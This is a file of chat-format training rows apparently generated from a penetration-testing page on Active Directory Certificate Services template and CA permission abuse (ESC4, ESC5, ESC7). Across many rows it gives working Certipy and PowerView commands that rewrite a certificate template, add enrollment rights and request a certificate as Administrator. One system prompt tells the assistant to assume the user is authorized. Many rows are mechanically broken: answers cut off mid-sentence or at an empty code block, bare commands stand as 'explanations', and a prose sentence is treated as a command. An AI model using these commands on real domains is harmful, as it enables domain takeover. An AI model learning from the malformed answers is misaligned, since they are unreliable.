{"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Access controls - Theory in the context of penetration testing"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).\n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes:\n\n* Certificate templates (ESC4): powerful rights over these objects can allow attackers to _\"push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the mspki-certificate-name-flag flag for a template that allows for domain authentication) this results in the same domain compromise scenario \\[...]\" (__specterops.io__)_ as the one based on misconfigured certificate templates where low-privs users can specify an arbitrary SAN (subjectAltName) and authenticate as anyone else.\n* The Certificate Authority (ESC7): _\"The two main rights here are the ManageCA right and the ManageCertificates right, which translate to the “CA administrator” and “Certificate Manager” (sometimes known as a CA officer) respectively. known as Officer rights)\" (__specterops.io__)_.\n * Attack path 1: if an attacker gains control over a principal that has the ManageCA right over the CA, or local admin right, he can remotely flip the EDITF_ATTRIBUTESUBJECTALTNAME2 bit to allow SAN specification in any template (c.f. CA misconfiguration). This only works if the attacker is able to restart the CertSvc service on the CA server.\n * Attack path 2: alternatively (or if the attacker can't restart the CertSrv), if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely gain the ManageCertificates right, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).\n* Several other objects (ESC5): abuse standard AD access control abuse over regulard AD objects.\n * The CA server’s AD computer object (i.e., compromise"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Access controls - Theory in the context of penetration testing", "response": "In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).\n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes:\n\n* Certificate templates (ESC4): powerful rights over these objects can allow attackers to _\"push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the mspki-certificate-name-flag flag for a template that allows for domain authentication) this results in the same domain compromise scenario \\[...]\" (__specterops.io__)_ as the one based on misconfigured certificate templates where low-privs users can specify an arbitrary SAN (subjectAltName) and authenticate as anyone else.\n* The Certificate Authority (ESC7): _\"The two main rights here are the ManageCA right and the ManageCertificates right, which translate to the “CA administrator” and “Certificate Manager” (sometimes known as a CA officer) respectively. known as Officer rights)\" (__specterops.io__)_.\n * Attack path 1: if an attacker gains control over a principal that has the ManageCA right over the CA, or local admin right, he can remotely flip the EDITF_ATTRIBUTESUBJECTALTNAME2 bit to allow SAN specification in any template (c.f. CA misconfiguration). This only works if the attacker is able to restart the CertSvc service on the CA server.\n * Attack path 2: alternatively (or if the attacker can't restart the CertSrv), if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely gain the ManageCertificates right, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).\n* Several other objects (ESC5): abuse standard AD access control abuse over regulard AD objects.\n * The CA server’s AD computer object (i.e., compromise", "metadata": {"corpus_index": 0, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Access controls - Theory"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).\n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes:\n\n* Certificate templates (ESC4): powerful rights over these objects can allow attackers to _\"push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the mspki-certificate-name-flag flag for a template that allows for domain authentication) this results in the same domain compromise scenario \\[...]\" (__specterops.io__)_ as the one based on misconfigured certificate templates where low-privs users can specify an arbitrary SAN (subjectAltName) and authenticate as anyone else.\n* The Certificate Authority (ESC7): _\"The two main rights here are the ManageCA right and the ManageCertificates right, which translate to the “CA administrator” and “Certificate Manager” (sometimes known as a CA officer) respectively. known as Officer rights)\" (__specterops.io__)_.\n * Attack path 1: if an attacker gains control over a principal that has the ManageCA right over the CA, or local admin right, he can remotely flip the EDITF_ATTRIBUTESUBJECTALTNAME2 bit to allow SAN specification in any template (c.f. CA misconfiguration). This only works if the attacker is able to restart the CertSvc service on the CA server.\n * Attack path 2: alternatively (or if the attacker can't restart the CertSrv), if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely gain the ManageCertificates right, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).\n* Several other objects (ESC5): abuse standard AD access control abuse over regulard AD objects.\n * The CA server’s AD computer object (i.e., compromise"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Access controls - Theory", "response": "In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on access control misconfigurations (dubbed ESC4, ESC5 and ESC7).\n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes:\n\n* Certificate templates (ESC4): powerful rights over these objects can allow attackers to _\"push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the mspki-certificate-name-flag flag for a template that allows for domain authentication) this results in the same domain compromise scenario \\[...]\" (__specterops.io__)_ as the one based on misconfigured certificate templates where low-privs users can specify an arbitrary SAN (subjectAltName) and authenticate as anyone else.\n* The Certificate Authority (ESC7): _\"The two main rights here are the ManageCA right and the ManageCertificates right, which translate to the “CA administrator” and “Certificate Manager” (sometimes known as a CA officer) respectively. known as Officer rights)\" (__specterops.io__)_.\n * Attack path 1: if an attacker gains control over a principal that has the ManageCA right over the CA, or local admin right, he can remotely flip the EDITF_ATTRIBUTESUBJECTALTNAME2 bit to allow SAN specification in any template (c.f. CA misconfiguration). This only works if the attacker is able to restart the CertSvc service on the CA server.\n * Attack path 2: alternatively (or if the attacker can't restart the CertSrv), if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely gain the ManageCertificates right, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).\n* Several other objects (ESC5): abuse standard AD access control abuse over regulard AD objects.\n * The CA server’s AD computer object (i.e., compromise", "metadata": {"corpus_index": 0, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Access controls - Practice?"}, {"role": "assistant", "content": "> [!TIP]\n>\n> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the certificate template (source).\n> \n> PowerSploit's Add-DomainObjectAcl function (in PowerView) can be used to add Certificate-Enrollment rights to a \"controlled AD object\" over a specific template. In order to achieve this, the attacker needs to have enough rights (i.e. WriteDacl) over the certificate template.\n> \n> ``powershell\n> Add-DomainObjectAcl -TargetIdentity \"target template\" -PrincipalIdentity \"controlled object\" -RightsGUID \"0e10c968-78fb-11d2-90d4-00c04f79dc55\" -TargetSearchBase \"LDAP://CN=Configuration,DC=DOMAIN,DC=LOCAL\" -Verbose\n> `\n> \n> The example above shows how to edit a certificate template's DACL (requires WriteDacl over the template, i.e. ESC4), but modifying a CA's DACL follows the same principle (requires WriteDacl` over the CA, i.e. ESC7)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Access controls - Practice?", "response": "> [!TIP]\n>\n> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the certificate template (source).\n> \n> PowerSploit's Add-DomainObjectAcl function (in PowerView) can be used to add Certificate-Enrollment rights to a \"controlled AD object\" over a specific template. In order to achieve this, the attacker needs to have enough rights (i.e. WriteDacl) over the certificate template.\n> \n> ``powershell\n> Add-DomainObjectAcl -TargetIdentity \"target template\" -PrincipalIdentity \"controlled object\" -RightsGUID \"0e10c968-78fb-11d2-90d4-00c04f79dc55\" -TargetSearchBase \"LDAP://CN=Configuration,DC=DOMAIN,DC=LOCAL\" -Verbose\n> `\n> \n> The example above shows how to edit a certificate template's DACL (requires WriteDacl over the template, i.e. ESC4), but modifying a CA's DACL follows the same principle (requires WriteDacl` over the CA, i.e. ESC7).", "metadata": {"corpus_index": 1, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Access controls - Practice"}, {"role": "assistant", "content": "> [!TIP]\n>\n> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the certificate template (source).\n> \n> PowerSploit's Add-DomainObjectAcl function (in PowerView) can be used to add Certificate-Enrollment rights to a \"controlled AD object\" over a specific template. In order to achieve this, the attacker needs to have enough rights (i.e. WriteDacl) over the certificate template.\n> \n> ``powershell\n> Add-DomainObjectAcl -TargetIdentity \"target template\" -PrincipalIdentity \"controlled object\" -RightsGUID \"0e10c968-78fb-11d2-90d4-00c04f79dc55\" -TargetSearchBase \"LDAP://CN=Configuration,DC=DOMAIN,DC=LOCAL\" -Verbose\n> `\n> \n> The example above shows how to edit a certificate template's DACL (requires WriteDacl over the template, i.e. ESC4), but modifying a CA's DACL follows the same principle (requires WriteDacl` over the CA, i.e. ESC7)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Access controls - Practice", "response": "> [!TIP]\n>\n> Maliciously configuring a CA or a certificate template can be insufficient. A controlled AD object (user or computer) must also have the ability to request a certificate for that template. > The controlled AD object must have Certificate-Enrollment rights over the enrollment services (i.e. CA) and over the certificate template (source).\n> \n> PowerSploit's Add-DomainObjectAcl function (in PowerView) can be used to add Certificate-Enrollment rights to a \"controlled AD object\" over a specific template. In order to achieve this, the attacker needs to have enough rights (i.e. WriteDacl) over the certificate template.\n> \n> ``powershell\n> Add-DomainObjectAcl -TargetIdentity \"target template\" -PrincipalIdentity \"controlled object\" -RightsGUID \"0e10c968-78fb-11d2-90d4-00c04f79dc55\" -TargetSearchBase \"LDAP://CN=Configuration,DC=DOMAIN,DC=LOCAL\" -Verbose\n> `\n> \n> The example above shows how to edit a certificate template's DACL (requires WriteDacl over the template, i.e. ESC4), but modifying a CA's DACL follows the same principle (requires WriteDacl` over the CA, i.e. ESC7).", "metadata": {"corpus_index": 1, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Access controls - Certificate templates (ESC4)"}, {"role": "assistant", "content": "In order to obtain an abusable template, some attributes and parameters need to be properly setup\n\n1. Get Enrollment rights for the vulnerable template\n2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval\n3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requirement\n4. Enable ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN\n5. Set mspki-certificate-application-policy to a certificate purpose for authentication\n 1. Client Authentication (OID: 1.3.6.1.5.5.7.3.2)\n 2. Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)\n 3. PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)\n 4. Any Purpose (OID: 2.5.29.37.0)\n 5. No EKU\n6. Request a certificate (with a high-privileged user's name set as SAN) for authentication and perform Pass the Ticket.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate these sensitive access control entries (how to enumerate), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.\n\n> [!WARNING] Certipy v5\n> Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.\n\n> [!WARNING] Template backup\n> Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Access controls - Certificate templates (ESC4)", "response": "In order to obtain an abusable template, some attributes and parameters need to be properly setup\n\n1. Get Enrollment rights for the vulnerable template\n2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval\n3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requirement\n4. Enable ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN\n5. Set mspki-certificate-application-policy to a certificate purpose for authentication\n 1. Client Authentication (OID: 1.3.6.1.5.5.7.3.2)\n 2. Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)\n 3. PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)\n 4. Any Purpose (OID: 2.5.29.37.0)\n 5. No EKU\n6. Request a certificate (with a high-privileged user's name set as SAN) for authentication and perform Pass the Ticket.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate these sensitive access control entries (how to enumerate), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.\n\n> [!WARNING] Certipy v5\n> Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.\n\n> [!WARNING] Template backup\n> Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.\n\n```bash", "metadata": {"corpus_index": 2, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Access controls - Certificate templates (ESC4)?"}, {"role": "assistant", "content": "In order to obtain an abusable template, some attributes and parameters need to be properly setup\n\n1. Get Enrollment rights for the vulnerable template\n2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval\n3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requirement\n4. Enable ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN\n5. Set mspki-certificate-application-policy to a certificate purpose for authentication\n 1. Client Authentication (OID: 1.3.6.1.5.5.7.3.2)\n 2. Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)\n 3. PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)\n 4. Any Purpose (OID: 2.5.29.37.0)\n 5. No EKU\n6. Request a certificate (with a high-privileged user's name set as SAN) for authentication and perform Pass the Ticket.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate these sensitive access control entries (how to enumerate), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.\n\n> [!WARNING] Certipy v5\n> Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.\n\n> [!WARNING] Template backup\n> Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Access controls - Certificate templates (ESC4)?", "response": "In order to obtain an abusable template, some attributes and parameters need to be properly setup\n\n1. Get Enrollment rights for the vulnerable template\n2. Disable PEND_ALL_REQUESTS flag in mspki-enrollment-flag for disabling Manager Approval\n3. Set mspki-ra-signature attribute to 0 to disable Authorized Signature requirement\n4. Enable ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN\n5. Set mspki-certificate-application-policy to a certificate purpose for authentication\n 1. Client Authentication (OID: 1.3.6.1.5.5.7.3.2)\n 2. Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)\n 3. PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)\n 4. Any Purpose (OID: 2.5.29.37.0)\n 5. No EKU\n6. Request a certificate (with a high-privileged user's name set as SAN) for authentication and perform Pass the Ticket.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate these sensitive access control entries (how to enumerate), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.\n\n> [!WARNING] Certipy v5\n> Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.\n\n> [!WARNING] Template backup\n> Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.\n\n```bash", "metadata": {"corpus_index": 2, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 1. Save the old configuration, edit the template and make it vulnerable"}, {"role": "assistant", "content": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-default-configuration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 1. Save the old configuration, edit the template and make it vulnerable", "response": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-default-configuration", "metadata": {"corpus_index": 3, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 1. Save the old configuration, edit the template and make it vulnerable"}, {"role": "assistant", "content": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-default-configuration"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 1. Save the old configuration, edit the template and make it vulnerable", "response": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-default-configuration", "metadata": {"corpus_index": 3, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 2. Request a template certificate with a custom SAN in the context of penetration testing"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca \"$CA_NAME\" -template \"$ESC4_TEMPLATE_NAME\" -upn \"Administrator@$DOMAIN\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 2. Request a template certificate with a custom SAN in the context of penetration testing", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca \"$CA_NAME\" -template \"$ESC4_TEMPLATE_NAME\" -upn \"Administrator@$DOMAIN\"", "metadata": {"corpus_index": 4, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 2. Request a template certificate with a custom SAN"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca \"$CA_NAME\" -template \"$ESC4_TEMPLATE_NAME\" -upn \"Administrator@$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 2. Request a template certificate with a custom SAN", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca \"$CA_NAME\" -template \"$ESC4_TEMPLATE_NAME\" -upn \"Administrator@$DOMAIN\"", "metadata": {"corpus_index": 4, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 3. After the attack, restore the original configuration?"}, {"role": "assistant", "content": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-configuration \"$ESC4_TEMPLATE_NAME.json\" -no-save\n``\n\nIf a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 3. After the attack, restore the original configuration?", "response": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-configuration \"$ESC4_TEMPLATE_NAME.json\" -no-save\n``\n\nIf a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.\n\n``bash", "metadata": {"corpus_index": 5, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 3. After the attack, restore the original configuration"}, {"role": "assistant", "content": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-configuration \"$ESC4_TEMPLATE_NAME.json\" -no-save\n``\n\nIf a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 3. After the attack, restore the original configuration", "response": "certipy template -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -template \"$ESC4_TEMPLATE_NAME\" -write-configuration \"$ESC4_TEMPLATE_NAME.json\" -no-save\n``\n\nIf a more precise template modification is needed, modifyCertTemplate (Python) can be used to modify each attributes of the template.\n\n``bash", "metadata": {"corpus_index": 5, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use If for 3. after the attack, restore the original configuration?"}, {"role": "assistant", "content": "If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use If for 3. after the attack, restore the original configuration?", "response": "If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.", "metadata": {"corpus_index": 6, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 3. After the attack, restore the original configuration?"}, {"role": "assistant", "content": "If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 3. After the attack, restore the original configuration?", "response": "If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.", "metadata": {"corpus_index": 6, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.`?"}, {"role": "assistant", "content": "This command is used for 3. after the attack, restore the original configuration. 3. After the attack, restore the original configuration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.`?", "response": "This command is used for 3. after the attack, restore the original configuration. 3. After the attack, restore the original configuration", "metadata": {"corpus_index": 6, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 1. Disable Manager Approval Requirement?"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 1. Disable Manager Approval Requirement?", "response": "modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 7, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 1. Disable Manager Approval Requirement?"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions 